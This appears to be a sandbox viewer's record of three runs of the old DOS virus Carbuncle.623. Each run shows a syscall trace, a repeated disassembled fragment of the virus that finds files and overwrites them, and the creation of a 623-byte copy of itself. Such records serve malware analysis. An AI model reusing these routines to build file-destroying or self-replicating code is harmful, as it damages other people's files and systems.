Sample viewer

vx.netlux.org/Virus.DOS.Carbuncle.623

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:35:54.292717173Z 44 PC: 12a58 | Get time
0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25c], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25d
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25c]
0x12a85: je 0x12a50
2018-12-17T22:35:54.295801885Z 60 PC: 12a96 | Create or truncate file
2018-12-17T22:35:54.318120399Z 64 PC: 12aa2 | Write file or device (Write 623 bytes on handle 5)
2018-12-17T22:35:54.327486137Z 62 PC: 12aa6 | Close file
2018-12-17T22:35:54.33300169Z 67 PC: 12ab1 | Get or set file attributes
2018-12-17T22:35:54.341382477Z 26 PC: 12ab9 | Set disk transfer address
2018-12-17T22:35:54.342534509Z 78 PC: 12ac1 | Find first file
2018-12-17T22:35:54.364970432Z 76 PC: 12a54 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6482,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:29.958352986Z 44 PC: 12a58 | Get time
0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25c], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25d
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25c]
0x12a85: je 0x12a50
2018-12-25T11:59:29.960743967Z 78 PC: 12a69 | Find first file
2018-12-25T11:59:29.966357862Z 60 PC: 12a96 | Create or truncate file
2018-12-25T11:59:30.641952315Z 64 PC: 12aa2 | Write file or device (Write 623 bytes on handle 5)
2018-12-25T11:59:30.661940175Z 62 PC: 12aa6 | Close file
2018-12-25T11:59:30.672143644Z 67 PC: 12ab1 | Get or set file attributes
2018-12-25T11:59:30.685890365Z 26 PC: 12ab9 | Set disk transfer address
2018-12-25T11:59:30.68817064Z 78 PC: 12ac1 | Find first file
2018-12-25T11:59:30.697578118Z 76 PC: 12a54 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":17,"TimeBased":true,"OriginalID":6482,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:29.942135625Z 44 PC: 12a58 | Get time
0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25c], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25d
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25c]
0x12a85: je 0x12a50
2018-12-25T11:59:29.945615865Z 60 PC: 12a96 | Create or truncate file
2018-12-25T11:59:30.604453618Z 64 PC: 12aa2 | Write file or device (Write 623 bytes on handle 5)
2018-12-25T11:59:30.641225153Z 62 PC: 12aa6 | Close file
2018-12-25T11:59:30.655106878Z 67 PC: 12ab1 | Get or set file attributes
2018-12-25T11:59:30.665473406Z 26 PC: 12ab9 | Set disk transfer address
2018-12-25T11:59:30.666556164Z 78 PC: 12ac1 | Find first file
2018-12-25T11:59:30.675945263Z 76 PC: 12a54 | Terminate with return code (Return code = '18')